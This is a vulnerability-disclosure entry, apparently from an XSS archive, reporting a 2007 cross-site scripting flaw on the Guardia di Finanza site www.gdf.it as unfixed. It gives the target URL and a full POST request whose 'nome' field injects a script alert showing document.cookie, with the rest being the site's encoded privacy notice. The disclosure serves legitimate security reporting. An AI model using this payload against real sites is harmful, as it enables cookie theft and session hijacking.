Security researcher JackLantern, has submitted on 28/08/2007 a cross-site-scripting (XSS) vulnerability affecting www.gdf.it, which at the time of submission ranked 201332 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 28/08/2007 |
Date published: 28/08/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: JackLantern |
Domain: www.gdf.it |
Category: XSS |
Pagerank: 201332 |
|---|
| URL: http://www.gdf.it/cpsps/user/verifyData.jsp |
| POST: nome=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&cognome=&giorno=01&mese=01&anno=&ci tta=&provincia=-1&statoCivile=0&sesso=0&userName=&password=&confirmPassword=&email=&informativa=Dati +personali+relativi+agli+utenti%0D%0APer+poter+entrare+a+far+parte+della+comunit%E0+on+line+della+Gu ardia+di+Finanza+e+accedere+ad+alcuni+servizi+%28forum%2C+newsletter%29+%E8+necessario+effettuare+la +registrazione+al+Portale+%28www.gdf.it%29.+Durante+la+registrazione+all%27utente+sono+richiesti+dat i+personali.+%0D%0AI+dati+vengono+archiviati+in+una+banca+di+dati+e+trattati+secondo+l%27art.+7+-+Co dice+in+materia+di+protezione+dei+dati+personali+-+Decreto+legislativo+30+giugno+2003%2C+n.+196.+%0D %0A%0D%0AIn+base+a+tale+articolo+l%27utente+ha+il+diritto+di+ottenere%3A%0D%0A-+l%27aggiornamento%2C +la+rettifica+e+l%27integrazione+dei+dati+che+lo+riguardano%0D%0A%0D%0A-+la+cancellazione%2C+la+tras formazione+in+forma+anonima+o+il+blocco+dei+dati+trattati+in+violazione+di+legge%2C+%0D%0A%0D%0A-+l% 27interessato+ha+il+diritto+di+opporsi+in+tutto+o+in+parte+per+motivi+legittimi+al+trattamento+dei+d ati+personali+che+lo+riguardano%2C+sebbene+pertinenti+allo+scopo+della+raccolta%3B%0D%0A%0D%0A-+ha+i l+diritto+di+opporsi+al+trattamento+di+dati+personali+che+lo+riguardano+a+fini+di+invio+di+materiale +pubblicitario+o+di+vendita+diretta+o+per+il+compimento+di+ricerche+di+mercato+o+di+comunicazione+co mmerciale.%0D%0A%0D%0A%0D%0AModalit%E0+del+trattamento%0D%0AI+dati+personali+oggetto+di+trattamento+ sono%0D%0A%0D%0A-+trattati+in+modo+lecito+e+secondo+correttezza+%0D%0A%0D%0A-+raccolti+e+registrati+ per+scopi+determinati%2C+espliciti+e+legittimi%2C+ed+utilizzati+in+altre+operazioni+del+trattamento+ intermini+compatibili+con+tali+scopi%3B%0D%0A%0D%0A-+esatti+e%2C+se+necessario%2C+aggiornati%3B%0D%0 A%0D%0A-+pertinenti%2C+completi+e+non+eccedenti+rispetto+alle+finalit%E0+per+le+quali+sono+raccolti+ o+successivamente+trattati%3B%0D%0A%0D%0A-+conservati+in+una+forma+che+consenta+l%27identificazione+ dell%27interessato+per+un+periodo+di+tempo+non+superiore+a+quello+necessario+agli+scopi+per+i+quali+ essi+sono+stati+raccolti+o+successivamente+trattati.%0D%0A%0D%0AInoltre+i+dati+personali+sono+tratta ti+da+personale+esplicitamente+incaricato+con+strumenti+automatizzati+e+potranno+essere+comunicati+a +terzi+solo+nel+caso+in+cui+ci%F2+sia+necessario+per+la+fornitura+del+servizio+e%2Fo+del+prodotto+ri chiesto.%0D%0A%0D%0AMisure+di+sicurezza%0D%0AI+dati+personali+oggetto+di+trattamento+sono+custoditi+ e+controllati%2C+anche+in+relazione+alle+conoscenze+acquisite+in+base+al+progresso+tecnico%2C+alla+n atura+dei+dati+e+alle+specifiche+caratteristiche+del+trattamento%2C+in+modo+da+ridurre+al+minimo%2C+ mediante+l%27adozione+di+idonee+e+preventive+misure+di+sicurezza%2C+i+rischi+di+distruzione+o+perdit a%2C+anche+accidentale%2C+dei+dati+stessi%2C+di+accesso+non+autorizzato+o+di+trattamento+non+consent ito+o+non+conforme+alle+finalit%E0+della+raccolta.%0D%0A%0D%0A%0D%0APer+maggiori+informazioni+visita +il+sito+del+garante+per+la+protezione+dei+dati+personali%3A%0D%0ADecreto+legislativo+30+giugno+2003 %2C+n.+196+-+Codice+in+materia+di+protezione+dei+dati+personali%0D%0A%28http%3A%2F%2Fwww.garantepriv acy.it%2Fgarante%2Fdoc.jsp%3FID%3D1042761+%29%0D%0A%0D%0APer+informazioni%3A%0D%0Awebmaster%40gdf.it %0D%0A%09&send=invia |
|
Click here to view the mirror
|
|
|
| 
